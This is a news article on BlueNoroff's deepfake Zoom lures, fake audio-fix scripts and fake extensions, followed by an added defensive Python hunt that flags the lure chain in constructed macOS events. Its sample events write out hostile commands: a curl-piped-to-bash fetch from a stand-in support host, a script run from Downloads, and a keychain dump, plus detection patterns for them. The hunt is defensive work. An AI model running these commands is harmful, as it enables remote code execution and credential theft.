
North Korean Hackers Launch Sophisticated Zoom-Based Attacks


Security researchers are warning of a sharp uptick in social engineering attacks on Zoom users, traced back to BlueNoroff, a North Korean state-backed hacking group infamous for targeting financial institutions. The latest wave of attacks blends deepfake video calls, fake Zoom extensions, and terminal scripts, all designed to silently compromise victims’ systems and steal sensitive data.

In these attacks, victims are lured into Zoom meetings orchestrated by attackers, who then simulate technical issues—usually audio problems—to pressure targets into executing malicious scripts or downloading infected extensions. The result? Full remote access for the attackers and extensive data exfiltration.

From Deepfake Zoom Calls to Full-System Takeover

One of the most telling incidents involved Eugene Vyborov, founder and CEO of Ability AI. He was invited to what appeared to be a regular Zoom meeting. The call, however, featured deepfakes of business associates, and when the audio failed he was directed to a phony Zoom support page urging him to run terminal commands. Sensing foul play, Vyborov suggested switching to Google Meet; the attackers refused, citing "company policy". Once he cut off communication, they promptly deleted their Telegram chat and disappeared.

Not all victims were so lucky. In late May, an employee of a Canadian online gambling company fell victim to a similar scheme. According to Field Effect, the victim was tricked into running a script posing as a Zoom audio fix. Instead, it deployed infostealer malware and a loader that gave the attackers long-term access to the system. Browser history, keychain credentials, and saved login details were siphoned off almost immediately.

Then in June, Huntress documented another elaborate attack on a cryptocurrency foundation employee. The employee was invited to a Zoom call with deepfake versions of senior leadership. After microphone problems, they were told to download a fake Zoom extension sent via Telegram. The extension turned out to be AppleScript malware that installed multiple backdoors, keyloggers, and info stealers. Huntress identified eight separate malicious binaries, including CryptoBot, Root Troy V4, XScreen, and InjectWithDyld, designed to maintain stealthy persistence and extract valuable data.
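The chain described in the three incidents above (a terminal command or AppleScript run from an interactive session, a payload fetched from a fake support site, a LaunchAgent for persistence, and keychain theft) leaves a recognisable footprint in endpoint telemetry. The following hunt is an added example and is not code from the original article, from Huntress, or from Field Effect. It assumes a simplified, constructed process and file event format; the sample events, hostnames, file names and paths are all invented for illustration and are not indicators from the reported campaign.

```python
"""Hunt for the Zoom 'audio fix' lure chain in simplified macOS endpoint events.

Added example, not from the article or the cited vendors. Event schema and
every sample value below are constructed for illustration only.
"""
import os
import re
import shlex

# Constructed sample telemetry: each dict is one process start or file write
# as an EDR might record it. None of these values are real indicators.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "user": "eve", "parent": "Terminal",
     "cmd": "curl -fsSL https://zoom-support.example/fix_audio.sh | bash"},
    {"id": 2, "type": "process", "user": "eve", "parent": "Terminal",
     "cmd": "osascript /Users/eve/Downloads/zoom_audio_fix.scpt"},
    {"id": 3, "type": "process", "user": "eve", "parent": "bash",
     "cmd": "security dump-keychain -d /Users/eve/Library/Keychains/login.keychain-db"},
    {"id": 4, "type": "file", "user": "eve", "process": "osascript",
     "path": "/Users/eve/Library/LaunchAgents/com.example.zoomfix.plist"},
    {"id": 5, "type": "process", "user": "eve", "parent": "launchd",
     "cmd": "/Applications/zoom.us.app/Contents/MacOS/zoom.us"},
    {"id": 6, "type": "file", "user": "eve", "process": "Installer",
     "path": "/Users/eve/Library/LaunchAgents/com.vendor.agent.plist"},
    {"id": 7, "type": "process", "user": "eve", "parent": "Terminal",
     "cmd": "git pull"},
]

# A victim following 'support' instructions types into a terminal, so the
# interesting process events are children of an interactive shell.
INTERACTIVE_SHELLS = {"Terminal", "iTerm2", "bash", "zsh", "sh"}
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python3", "python"}
USER_WRITABLE = re.compile(
    r"^/(Users/[^/]+/(Downloads|Desktop|Library/Caches)|tmp|private/tmp)/")
LAUNCH_AGENT = re.compile(r"^/Users/[^/]+/Library/LaunchAgents/[^/]+\.plist$")
KEYCHAIN = re.compile(r"Library/Keychains/|login\.keychain")


def _argv(segment):
    """Tokenise one pipeline stage; fall back to whitespace on bad quoting."""
    try:
        return shlex.split(segment)
    except ValueError:
        return segment.split()


def _basename(argv):
    return os.path.basename(argv[0]) if argv else ""


def download_piped_to_interpreter(cmd):
    """curl/wget output piped straight into a shell or script interpreter."""
    stages = [_argv(s) for s in cmd.split("|")]
    if len(stages) < 2:
        return False
    return (_basename(stages[0]) in DOWNLOADERS
            and any(_basename(s) in INTERPRETERS for s in stages[1:]))


def script_from_user_writable_dir(cmd):
    """An interpreter run on a script that lives where a download would land."""
    argv = _argv(cmd)
    return (_basename(argv) in INTERPRETERS
            and any(USER_WRITABLE.match(a) for a in argv[1:]))


def classify(event):
    """Return the list of rule names an event triggers (empty if benign)."""
    hits = []
    if event["type"] == "process":
        cmd = event["cmd"]
        if event["parent"] in INTERACTIVE_SHELLS:
            if download_piped_to_interpreter(cmd):
                hits.append("download_piped_to_interpreter")
            if script_from_user_writable_dir(cmd):
                hits.append("script_from_user_writable_dir")
            if KEYCHAIN.search(cmd):
                hits.append("keychain_access_from_shell")
    elif event["type"] == "file":
        # Persistence: a LaunchAgent plist written by a script host rather
        # than by an installer or the application itself.
        if LAUNCH_AGENT.match(event["path"]) and event["process"] in INTERPRETERS:
            hits.append("launch_agent_written_by_interpreter")
    return hits


def hunt(events):
    """Flatten all hits into (event id, rule) pairs for triage."""
    return [(e["id"], rule) for e in events for rule in classify(e)]


if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Run on the constructed sample, events 1 to 4 each trigger exactly one rule while the legitimate Zoom launch, the installer-written plist and the `git pull` stay quiet. In a real deployment the rules would be fed from EDR process-tree data rather than a flat list, and the first two rules are the ones worth paging on: a user piping a fresh download into `bash` or running an AppleScript out of Downloads during a meeting is precisely the moment the incidents above describe.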

A Clear BlueNoroff Signature, With Over 200 Malicious Domains in Play

Investigators from Huntress and Field Effect have attributed the attacks to BlueNoroff, a subgroup of North Korea’s notorious Lazarus Group. Also known by aliases such as Stardust Chollima and Sapphire Sleet, BlueNoroff is heavily involved in cryptocurrency theft operations and has long focused on infiltrating fintech, gambling, and blockchain platforms.

The tactics seen in these Zoom-related incidents—including the use of deepfake participants, fake support portals, and Telegram-delivered malware—align closely with BlueNoroff’s known playbook. Cyber threat firm Validin also uncovered over 200 domains linked to this ongoing campaign, suggesting that these attacks are part of a larger and well-coordinated operation targeting high-value individuals across multiple sectors.

The takeaway for businesses? Even familiar platforms like Zoom are now being weaponized by advanced persistent threat (APT) groups. With social engineering becoming more convincing and harder to detect, defenders should treat any request to run terminal commands or install an add-on in order to fix a meeting problem as a red flag, no matter how familiar the platform or how senior the participant appears to be.
